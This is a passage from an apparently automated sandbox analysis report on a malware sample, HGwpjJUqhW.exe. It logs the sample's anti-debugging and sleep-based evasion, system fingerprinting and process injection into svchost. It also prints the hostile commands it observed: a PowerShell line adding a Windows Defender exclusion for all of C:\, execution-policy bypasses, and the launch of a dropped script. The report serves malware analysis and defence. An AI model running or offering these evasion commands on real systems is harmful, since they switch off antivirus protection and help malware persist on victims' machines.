                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 1878 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 4047 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 2368 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 236 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeThread sleep count: Count: 3398 delay: -10Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_036280F0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03625430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_03625430
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: !Datacenter without Hyper-V (core)
                              Source: HGwpjJUqhW.exe, 00000005.00000002.4132644653.00000000009E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: without Hyper-V for WESS
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Datacenter without Hyper-V
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: !Enterprise without Hyper-V (core)
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Datacenter without Hyper-V (core)
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Standard without Hyper-V
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Enterprise without Hyper-V (core)
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Enterprise without Hyper-V
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Standard without Hyper-V (core)
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: HPC Edition without Hyper-V
                              Source: HGwpjJUqhW.exe, 00000005.00000002.4132644653.00000000009E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Hyper-V Server
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeAPI call chain: ExitProcess graph end nodegraph_5-43454
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00D8B928 rdtsc 11_2_00D8B928
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363054D VirtualProtect ?,-00000001,00000104,?5_2_0363054D
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03627490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,5_2_03627490
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_02620AE4 mov eax, dword ptr fs:[00000030h]0_2_02620AE4
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02880AE4 mov eax, dword ptr fs:[00000030h]5_2_02880AE4
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034A00CD mov eax, dword ptr fs:[00000030h]5_2_034A00CD
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03626790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,5_2_03626790
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10016D55
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_02636D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02636D2C
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,5_2_0362DF10
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0362F00A
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03631F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_03631F67
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C36815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_02C36815
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C38587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02C38587

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Bypasses PowerShell execution policy
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Contains functionality to inject code into remote processes
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_036277E0
                              Contains functionality to inject threads in other processes
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_036277E0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe5_2_036277E0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe5_2_036277E0
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: HGwpjJUqhW.exe, 00000005.00000002.4139344582.0000000003904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                              Source: HGwpjJUqhW.exe, 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min472847Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_03625430
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
